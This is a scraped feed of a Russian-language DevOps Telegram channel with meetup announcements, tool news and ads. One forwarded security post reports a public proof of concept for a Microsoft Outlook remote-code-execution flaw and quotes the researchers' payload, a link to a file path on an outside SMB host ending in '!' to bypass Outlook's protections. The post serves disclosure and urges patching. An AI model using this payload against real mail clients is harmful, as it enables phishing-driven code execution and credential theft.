Forwarded from Делаем IT
Большая онлайн-встреча с лидерами веб и мобильного рынка пройдет уже сегодня🔖
Обсудим, с какими проблемами мы столкнулись в 2023 году и какие строим планы по развитию на 2024 год.
Подключайтесь в 18:00 по ссылке 🔗
Участники:
— Иван Клюкин СЕО из Synaptik
— Анатолий Дубенчак СЕО из Пиксель Плюс
— CEО Дима Юрин, Делаем IT
— СЕО Александр Комбаров из Пиробайта
— Вячеслав Кислицын СЕО из Reactive
— Дима Балыкин Сo-founder из Сedro
Приглашенный эксперт: Петр Федюшкин — Директор Partners’ Club by AGIMA
Обсудим, с какими проблемами мы столкнулись в 2023 году и какие строим планы по развитию на 2024 год.
Подключайтесь в 18:00 по ссылке 🔗
Участники:
— Иван Клюкин СЕО из Synaptik
— Анатолий Дубенчак СЕО из Пиксель Плюс
— CEО Дима Юрин, Делаем IT
— СЕО Александр Комбаров из Пиробайта
— Вячеслав Кислицын СЕО из Reactive
— Дима Балыкин Сo-founder из Сedro
Приглашенный эксперт: Петр Федюшкин — Директор Partners’ Club by AGIMA
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥3❤2⚡2
Forwarded from 3side кибербезопасности
Публичный эксплойт на критическую уязвимость Microsoft Outlook
Буквально сегодня в публичном доступе появился эксплойт в виде Poc (Proof of concept) для всех современных версий Outlook. Эксплойт позволяет выполнить удаленный код с правами приложения в обход всех проверок Майкрософт!
Оказалось, для обхода всех проверок и механизмов защиты достаточно в конец расширения документа добавить восклицательный знак. Пример исследователей Check Point:
От жертвы необходимо лишь нажать на ссылку в письме и код будет выполнен. Очевидно, что уязвимость будет максимально широко использоваться в фишинге.
Для защиты рекомендуется как можно быстрее установить обновление приложения.
Подробное описание уязвимости тут.
Оригинальное исследование тут.
Буквально сегодня в публичном доступе появился эксплойт в виде Poc (Proof of concept) для всех современных версий Outlook. Эксплойт позволяет выполнить удаленный код с правами приложения в обход всех проверок Майкрософт!
Оказалось, для обхода всех проверок и механизмов защиты достаточно в конец расширения документа добавить восклицательный знак. Пример исследователей Check Point:
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>* От жертвы необходимо лишь нажать на ссылку в письме и код будет выполнен. Очевидно, что уязвимость будет максимально широко использоваться в фишинге.
Для защиты рекомендуется как можно быстрее установить обновление приложения.
Подробное описание уязвимости тут.
Оригинальное исследование тут.
GitHub
GitHub - xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability: Microsoft-Outlook-Remote-Code-Execution-Vulnerability
Microsoft-Outlook-Remote-Code-Execution-Vulnerability - xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
🔥9👍6❤3
👉 Что есть в репозитории:
#cicd #devops #gitlab #jenkins
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5⚡4👍4❤3👾2
Фреймворк для создания сетевых сервисов
Платформа Pingora — среда Rust для создания программируемых сетевых сервисов. Открытый исходный код, безопасность, асинхронность и многопоточность.
Помогает создавать сервисы поверх HTTP/1 и HTTP/2, TLS или TCP/UDP. В качестве прокси-сервера он поддерживает сквозное проксирование. Поддерживает как широко используемые библиотеки OpenSSL, так и BoringSSL, которые соответствуют требованиям FIPS и пост-квантовому шифрованию.
#devops #rust
@DevOpsKaz
Платформа Pingora — среда Rust для создания программируемых сетевых сервисов. Открытый исходный код, безопасность, асинхронность и многопоточность.
Помогает создавать сервисы поверх HTTP/1 и HTTP/2, TLS или TCP/UDP. В качестве прокси-сервера он поддерживает сквозное проксирование. Поддерживает как широко используемые библиотеки OpenSSL, так и BoringSSL, которые соответствуют требованиям FIPS и пост-квантовому шифрованию.
#devops #rust
@DevOpsKaz
👍4❤3🔥2🤡2👾2
👉 В статье вы узнаете про:
Пользуйтесь и делитесь с коллегами 🤝
#devsecops #devops #api #apisecurity
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥3⚡2❤2👾2
В феврале мы писали про платформу обучения SRE, которая поможет подготовиться к экзаменам CKA, CKS и CKAD. Вам зашло!
👉 Сегодня делимся видеоподкастом, где люди, причастные к платформе, обсуждают, как и чем она живет и много всего интересного:
👉 Ссылка на платформу
#devops #cka #cks #ckad #kubernetes #aws #eks
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
DKT64 - Тренажер подготовки к экзамену CKS и CKA(D)
В данном выпуске у нас "на кухне" в гостях Виктор Николаев, развивающий платформу-тренажер для подготовки к Kubernetes сертификации. В выпуске мы обсудим саму платформу, как и чем она живет и много всего интересного.
ССЫЛКИ
👨💻 Код проекта - https://git…
ССЫЛКИ
👨💻 Код проекта - https://git…
👍9🔥4⚡2❤2👾2
☁️ VK Cloud Meetup: Облачные технологии
Это возможность узнать о современных облачных технологиях, архитектурных решениях и Cloud-Native подходах. Спикеры поделятся трендами, кейсами и методами эффективного внедрения инструментов, оптимизации процессов и работы в команде.
🎙 Арман Нургалиев — Cloud Architect в Core24/7, автор статей канала KazDevOps. Мигрировал и внедрял более 40 проектов в публичных облаках при помощи terraform.
🎙 Александр Волынский — технический менеджер продукта VK Cloud. Более 15 лет опыта создания и внедрения решений для обработки данных на базе облачных сервисов. Эксперт в области Data Science и Data Engineering.
🎙 Сергей Смирнов — CPO облачной платформы bult.pro, TSARKA. Имеет 10-летний опыт в разработке приложений и высоконагруженных систем, работал в инфраструктурных командах Яндекса.
🚀 Приглашаем всех заинтересованных присоединиться к обсуждению и обмену опытом!
Формат митапа — оффлайн, но также будет онлайн-трансляция.
🗓 Дата: 14 марта (четверг) 2024
🕰 Начало: 17:00
📍 Место: Most IT Hub, Ходжанова, 2/2
👉 Регистрируйтесь здесь
Ждем вас на митапе!
Это возможность узнать о современных облачных технологиях, архитектурных решениях и Cloud-Native подходах. Спикеры поделятся трендами, кейсами и методами эффективного внедрения инструментов, оптимизации процессов и работы в команде.
🎙 Арман Нургалиев — Cloud Architect в Core24/7, автор статей канала KazDevOps. Мигрировал и внедрял более 40 проектов в публичных облаках при помощи terraform.
🎙 Александр Волынский — технический менеджер продукта VK Cloud. Более 15 лет опыта создания и внедрения решений для обработки данных на базе облачных сервисов. Эксперт в области Data Science и Data Engineering.
🎙 Сергей Смирнов — CPO облачной платформы bult.pro, TSARKA. Имеет 10-летний опыт в разработке приложений и высоконагруженных систем, работал в инфраструктурных командах Яндекса.
Формат митапа — оффлайн, но также будет онлайн-трансляция.
🗓 Дата: 14 марта (четверг) 2024
🕰 Начало: 17:00
📍 Место: Most IT Hub, Ходжанова, 2/2
👉 Регистрируйтесь здесь
Ждем вас на митапе!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5❤4🔥4⚡2
Улучшили Grafana Alerting, обновили визуализацию, внедрили новый плагин и многое другое.
Например, теперь есть инструмент предварительного просмотра миграции оповещений в Grafana Alerting — можно просматривать, редактировать и удалять перенесенные правила перед переключением. Также упростили маршрутизацию уведомлений.
Новый плагин позволяет пользователям напрямую запрашивать и визуализировать данные из SurrealDB в Grafana.
👉 Посмотрите весь список обновлений
А для тех, кто еще не пользовался Grafana, предлагаем глянуть мастер-класс Grafana as code — может, захотите попробовать 😜
#devops #grafana
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5⚡2❤2👍2👾2
Servercore открывает новую зону доступности в Ташкенте
Servercore — провайдер IT-инфраструктуры с зонами доступности в Ташкенте и Алматы. Среди клиентов — Uzum Nasiya, Alif, Samarkand Air и HWG Sababa.
Клиентам провайдера стала доступна новая зона доступности в Ташкенте. Размещение в двух объединенных общей сетью пулах позволит:
— увеличить отказоустойчивость IT-систем и сервисов,
— повысить уровень безопасности хранения данных,
— снизить задержку при обслуживании конечных пользователей.
В новой зоне доступности для клиентов Servercore стали доступны:
— облачные серверы в пуле UZ-2 на базе AMD EPYC 7713 Milan,
— выделенные серверы в TAS-2 на базе процессоров Intel Xeon E-2236, Intel Xeon W-2255 и Intel Xeon Silver 4214R.
Безопасность и надежность новой зоны доступности подтверждена международным стандартом по информационной безопасности ISO 27001. Все сервисы Servercore соответствуют международному стандарту безопасности данных PCI DSS.
Переходите на сайт, чтобы узнать больше
Servercore — провайдер IT-инфраструктуры с зонами доступности в Ташкенте и Алматы. Среди клиентов — Uzum Nasiya, Alif, Samarkand Air и HWG Sababa.
Клиентам провайдера стала доступна новая зона доступности в Ташкенте. Размещение в двух объединенных общей сетью пулах позволит:
— увеличить отказоустойчивость IT-систем и сервисов,
— повысить уровень безопасности хранения данных,
— снизить задержку при обслуживании конечных пользователей.
В новой зоне доступности для клиентов Servercore стали доступны:
— облачные серверы в пуле UZ-2 на базе AMD EPYC 7713 Milan,
— выделенные серверы в TAS-2 на базе процессоров Intel Xeon E-2236, Intel Xeon W-2255 и Intel Xeon Silver 4214R.
Безопасность и надежность новой зоны доступности подтверждена международным стандартом по информационной безопасности ISO 27001. Все сервисы Servercore соответствуют международному стандарту безопасности данных PCI DSS.
Переходите на сайт, чтобы узнать больше
👍8🔥5👾3🤣2
👉 Регистрируйтесь, выполняйте задание и забирайте ваучер на один из экзаменов:
· AI-900 Azure AI Fundamentals
· AI-102 Azure AI Engineer
· DP-100 Azure Data Scientist
· DP-600 Fabrics Analytics Engineer
Cloud Skills Challenge позволит получить 1 ваучер на экзамен. Каждое задание привязано к соответствующему экзамену.
👉 Вот официальные правила
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍6❤4👾2
🙋🏻♂️🙋🏽♂️ На вебинаре будут CEO стартапа Jasaim, Сырым Сериков и методолог Devpractice (учебно-методический центр на базе компании qazdev) Фёдор Чангариди.
🔍 Что вас ждёт:
🔹 Узнаете, как технология NFT меняет ландшафт образования и создаёт уникальные возможности для студентов и университетов.
🔸 Опыт эксперта: Сырым Сериков — CEO Jasaim и выпускник престижных программ K-Pro 7, Nuris Quickstart и Draper University.
🔹 Интересные кейсы применения NFT-дипломов в образовательной сфере и как они могут быть внедрены в вашем университете.
👉 Присоединяйтесь по ссылке
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5👍5⚡3🔥2
👉 Узнать подробнее
👉 Пример конфига
👉 Готовое решение
#devops #nginx #acme #ssl
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥6❤4⚡1
Наша компания в режиме 24/7 помогает решать бизнес-задачи максимально эффективно — под каждую у нас есть профессионалы, которые рождены, чтобы
➖ Аудит инфраструктуры
➖ Миграция в облако
➖ DevOps
➖ BigData
➖ Нагрузочное тестирование
➖ Web 3.0
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
core247.kz
Core 24/7 | Аудит инфраструктуры, мониторинга и кода
Оптимизация затрат на создание продуктов. Освобождение ресурсов ваших команд. Отслеживание сбоев и неправильных настроек.
❤7👍7👾5🔥2
500+ докладов с конференций Kubernetes за 2023 год
Кто-то очень сильно заморочился. Забирайте и делитесь с коллегами 🤝
#devops #k8s #kubernetes
@DevOpsKaz
Кто-то очень сильно заморочился. Забирайте и делитесь с коллегами 🤝
#devops #k8s #kubernetes
@DevOpsKaz
Reddit
From the kubernetes community on Reddit: All Kubernetes conference talks (+500) from 2023 ordered by the number of views
Explore this post and more from the kubernetes community
👍8🔥7❤4👾2
На мероприятии «Impact the Future» вы сможете:
🔹 Познакомиться с удивительными историями женщин-лидеров.
🔹 Узнать о последних тенденциях в мире IT и AI технологий.
🔹 Задать вопросы и обсудить актуальные темы с профессионалами отрасли.
▪️Дата: 16 марта
▪️Время: 09.30 - 16.00
▪️Место: Алматы Менеджмент Университет (Розыбакиева 227)
Организаторы мероприятия – ведущие казахстанские IT-сообщества, которые объединились, чтобы подарить вам незабываемый день, наполненный вдохновением и новыми возможностями!
🚀 Мы поддерживаем женщин в IT, создавая более разнообразное пространство, поощряем их активное участие и вдохновляем на успешную карьеру в этой области.
Не упустите возможность встретиться с теми, кто делает будущее уже сегодня! Регистрируйтесь по ссылке: https://gdg.community.dev/e/mckgdq/
🔹 Познакомиться с удивительными историями женщин-лидеров.
🔹 Узнать о последних тенденциях в мире IT и AI технологий.
🔹 Задать вопросы и обсудить актуальные темы с профессионалами отрасли.
▪️Дата: 16 марта
▪️Время: 09.30 - 16.00
▪️Место: Алматы Менеджмент Университет (Розыбакиева 227)
Организаторы мероприятия – ведущие казахстанские IT-сообщества, которые объединились, чтобы подарить вам незабываемый день, наполненный вдохновением и новыми возможностями!
🚀 Мы поддерживаем женщин в IT, создавая более разнообразное пространство, поощряем их активное участие и вдохновляем на успешную карьеру в этой области.
Не упустите возможность встретиться с теми, кто делает будущее уже сегодня! Регистрируйтесь по ссылке: https://gdg.community.dev/e/mckgdq/
🔥4❤3👍2👎2👾2
В ноябре 2023 года команда Quay.io перенесла базу данных c MySQL на Postgres. Хотя сама миграция прошла довольно гладко, для клиента это было не так.
Девопсы отметили нестабильность до и после миграции. Проблемы, с которыми они столкнулись, были связаны с увеличением трафика и различиями в поведении MySQL и Postgres под нагрузкой.
👉 Читайте интересный западных кейс, который поможет избежать подобных ошибок.
📝 Стек:
➖ Облачная платформа: Amazon Web Services (AWS)
➖ Сервисы баз данных: от MySQL до Amazon Aurora Postgres
➖ Инструмент миграции: AWS Data Migration Service (DMS)
➖ Платформа разработки: Red Hat OpenShift
➖ Хранилище: Amazon S3
#devops #postgres #mysql
@DevOpsKaz
Девопсы отметили нестабильность до и после миграции. Проблемы, с которыми они столкнулись, были связаны с увеличением трафика и различиями в поведении MySQL и Postgres под нагрузкой.
👉 Читайте интересный западных кейс, который поможет избежать подобных ошибок.
📝 Стек:
#devops #postgres #mysql
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5⚡5👍4🔥3
Forwarded from Архив Программиста
Современный интернет кишит червями, троянцами, незаконными посредниками и другими угрозами. Защита от них в наше время приобретает особую значимость. OpenSSL — один из самых широко используемых и важных проектов с открытым исходным кодом в интернете — предназначен для обеспечения сетевой безопасности. Из этой книги вы узнаете о самых важных возможностях OpenSSL и о его широком потенциале. Приводятся пошаговые объяснения основ криптографии и сетевой безопасности, а также практические примеры, иллюстрирующие эти идеи. Прочитав книгу, вы сможете реализовать криптографическую защиту и TLS в своих приложениях и сетевой инфраструктуре. Издание будет полезно разработчикам ПО, системным администраторам, инженерам по сетевой безопасности и специалистам по DevOps.
🔶Автор: А. Хлебников
🔶Год: 2023
Архив Программиста
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6⚡3🔥2👾2
В программе:
➖ Топовые спикеры
➖ Истории успеха международных компаний
➖ Возможности Copilot
➖ Практические пути применения ИИ с примерами
➖ Миграция в облако
➖ LLMOPS в Azure ML Studio и Azure AI Studio
➖ Генеративный ИИ на базе Azurе
➖ Нетворкинг и дискуссия
👉 Присоединяйтесь
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍4❤3👾2